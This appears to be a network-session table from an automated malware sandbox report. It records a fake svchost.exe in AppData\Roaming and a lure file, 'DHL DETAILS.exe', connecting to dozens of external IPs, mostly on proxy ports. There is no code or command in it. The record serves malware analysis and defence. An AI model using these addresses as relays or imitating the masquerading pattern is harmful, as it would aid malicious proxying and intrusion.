7341	192.168.2.5	64844	103.102.141.39	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7342	192.168.2.5	65521	27.65.114.8	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7343	192.168.2.5	61860	128.199.196.31	41672	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7344	192.168.2.5	64924	148.72.209.174	38088	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7345	192.168.2.5	64860	13.234.24.116	1080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7346	192.168.2.5	62183	190.111.209.207	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7347	192.168.2.5	65309	68.71.247.130	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7348	192.168.2.5	49209	104.18.20.160	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7349	192.168.2.5	64899	123.241.210.123	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7350	192.168.2.5	49225	172.67.181.58	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7351	192.168.2.5	49245	104.24.236.203	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7352	192.168.2.5	49243	104.18.161.122	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7353	192.168.2.5	49272	104.20.89.77	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7354	192.168.2.5	62145	182.93.80.3	8291	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7355	192.168.2.5	64159	162.240.231.211	41166	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7356	192.168.2.5	63974	72.217.158.202	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7357	192.168.2.5	49302	192.154.246.96	9000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7358	192.168.2.5	62407	51.158.105.203	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7359	192.168.2.5	57169	37.187.141.160	29064	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7360	192.168.2.5	62374	156.67.214.232	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7361	192.168.2.5	49247	20.24.43.214	8123	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7362	192.168.2.5	49266	91.65.102.60	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7363	192.168.2.5	49353	74.119.147.209	4145	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7364	192.168.2.5	49394	104.21.218.103	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7365	192.168.2.5	49294	8.210.80.191	15673	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7366	192.168.2.5	49303	46.17.63.166	4154	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7367	192.168.2.5	49298	122.51.123.219	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7368	192.168.2.5	49331	23.137.248.197	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7369	192.168.2.5	62518	163.172.153.194	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7370	192.168.2.5	49287	27.72.122.228	51067	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7371	192.168.2.5	49324	103.166.141.74	20074	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7372	192.168.2.5	49315	82.137.244.244	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7373	192.168.2.5	49388	185.110.190.99	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7374	192.168.2.5	65308	103.48.68.101	83	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7375	192.168.2.5	49423	68.71.247.130	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7376	192.168.2.5	49417	114.129.2.82	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7377	192.168.2.5	63040	192.111.137.35	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7378	192.168.2.5	49399	216.9.224.113	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7379	192.168.2.5	49552	192.154.246.96	9000	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7380	192.168.2.5	57838	37.156.146.163	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7381	192.168.2.5	49402	8.219.179.237	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7382	192.168.2.5	49488	51.15.242.202	8888	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7383	192.168.2.5	56483	204.199.120.28	999	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7384	192.168.2.5	56450	103.130.218.135	4002	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7385	192.168.2.5	60937	192.99.207.129	44523	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7386	192.168.2.5	49428	45.11.95.166	6008	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7387	192.168.2.5	49526	103.197.71.7	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7388	192.168.2.5	61209	177.234.244.174	32213	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7389	192.168.2.5	61157	198.89.91.90	5678	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7390	192.168.2.5	61337	162.241.46.40	64353	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7391	192.168.2.5	61345	102.215.197.202	9999	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7392	192.168.2.5	61288	177.234.194.155	999	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7393	192.168.2.5	61326	192.145.228.212	8081	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7394	192.168.2.5	61369	103.174.102.127	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7395	192.168.2.5	61480	54.36.122.16	29796	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7396	192.168.2.5	61492	20.42.119.47	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7397	192.168.2.5	49483	119.23.148.173	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7398	192.168.2.5	49539	118.184.157.111	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7399	192.168.2.5	49448	64.43.89.82	6341	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7400	192.168.2.5	57602	209.222.97.30	19481	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7401	192.168.2.5	61837	217.112.80.252	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7402	192.168.2.5	57918	91.134.140.160	32896	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7403	192.168.2.5	58085	185.108.141.114	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7404	192.168.2.5	64556	125.227.225.157	3389	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7405	192.168.2.5	49577	38.162.3.50	3128	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7406	192.168.2.5	65438	43.133.136.208	8800	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7407	192.168.2.5	49374	180.250.159.49	4153	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7408	192.168.2.5	49492	223.113.80.158	9091	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7409	192.168.2.5	65113	98.181.137.80	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7410	192.168.2.5	49565	95.56.254.139	3128	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7411	192.168.2.5	49186	92.204.135.37	8623	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7412	192.168.2.5	62707	45.11.95.166	6012	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7413	192.168.2.5	49779	172.67.181.144	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7414	192.168.2.5	49642	46.17.63.166	4154	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7415	192.168.2.5	49637	8.210.80.191	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7416	192.168.2.5	49205	188.132.221.163	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7417	192.168.2.5	65528	172.105.52.78	31106	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7418	192.168.2.5	49282	68.71.254.6	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7419	192.168.2.5	49646	23.137.248.197	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7420	192.168.2.5	49741	185.110.190.99	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7421	192.168.2.5	49701	103.166.141.74	20074	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7422	192.168.2.5	58297	107.180.88.41	57642	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7423	192.168.2.5	49825	45.43.81.44	5691	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7424	192.168.2.5	64852	184.178.172.17	4145	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7425	192.168.2.5	49960	193.84.89.202	8443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7426	192.168.2.5	49955	8.219.179.237	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7427	192.168.2.5	49693	111.59.4.88	9002	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7428	192.168.2.5	50033	212.33.205.42	8118	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7429	192.168.2.5	50264	119.23.148.173	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7430	192.168.2.5	49269	77.65.50.118	34159	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7431	192.168.2.5	49301	139.198.120.15	29527	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7432	192.168.2.5	58593	80.169.243.234	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7433	192.168.2.5	50532	162.159.241.12	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7434	192.168.2.5	49365	103.70.206.129	59311	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7435	192.168.2.5	58561	109.87.130.6	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7436	192.168.2.5	50713	184.72.36.89	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7437	192.168.2.5	64606	60.188.102.225	18080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7438	192.168.2.5	51267	43.134.230.122	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7439	192.168.2.5	50449	162.120.71.11	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7440	192.168.2.5	51270	43.134.230.122	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7441	192.168.2.5	51276	43.134.230.122	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7442	192.168.2.5	51283	43.134.230.122	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7443	192.168.2.5	50360	107.180.89.185	49062	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7444	192.168.2.5	50912	104.25.87.42	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7445	192.168.2.5	49414	218.65.6.150	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7446	192.168.2.5	50919	104.16.195.74	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7447	192.168.2.5	49647	68.71.247.130	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7448	192.168.2.5	51107	188.114.99.171	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7449	192.168.2.5	50346	23.137.248.197	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7450	192.168.2.5	50399	103.162.141.154	85	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7451	192.168.2.5	50577	103.69.87.142	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7452	192.168.2.5	50372	185.191.236.162	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7453	192.168.2.5	51287	172.67.219.60	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7454	192.168.2.5	49498	91.134.140.160	8879	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7455	192.168.2.5	50565	43.231.22.228	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7456	192.168.2.5	51024	195.87.217.75	3389	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7457	192.168.2.5	49698	192.111.137.35	4145	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7458	192.168.2.5	51246	193.84.89.202	8443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7459	192.168.2.5	51252	185.100.233.101	41138	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7460	192.168.2.5	51589	50.63.12.33	34644	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7461	192.168.2.5	49596	94.131.14.66	1081	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7462	192.168.2.5	63006	170.245.132.15	999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7463	192.168.2.5	51306	51.222.241.157	44029	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7464	192.168.2.5	51291	217.23.11.194	32708	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7465	192.168.2.5	51378	67.43.236.20	18203	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7466	192.168.2.5	63024	195.248.243.149	7237	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7467	192.168.2.5	51903	148.72.23.56	36111	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7468	192.168.2.5	51727	94.131.59.241	58378	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7469	192.168.2.5	51380	47.100.207.117	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7470	192.168.2.5	51714	8.211.4.215	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7471	192.168.2.5	51609	176.119.25.13	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7472	192.168.2.5	51706	89.168.121.175	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7473	192.168.2.5	65112	34.83.143.6	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7474	192.168.2.5	52240	98.178.72.21	10919	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7475	192.168.2.5	52300	212.118.43.143	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7476	192.168.2.5	52135	39.99.144.43	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7477	192.168.2.5	53040	133.18.234.13	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7478	192.168.2.5	52557	8.219.97.248	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7479	192.168.2.5	53603	172.67.181.126	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7480	192.168.2.5	51727	94.131.59.241	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7481	192.168.2.5	55810	200.111.182.6	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7482	192.168.2.5	53562	3.97.176.251	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

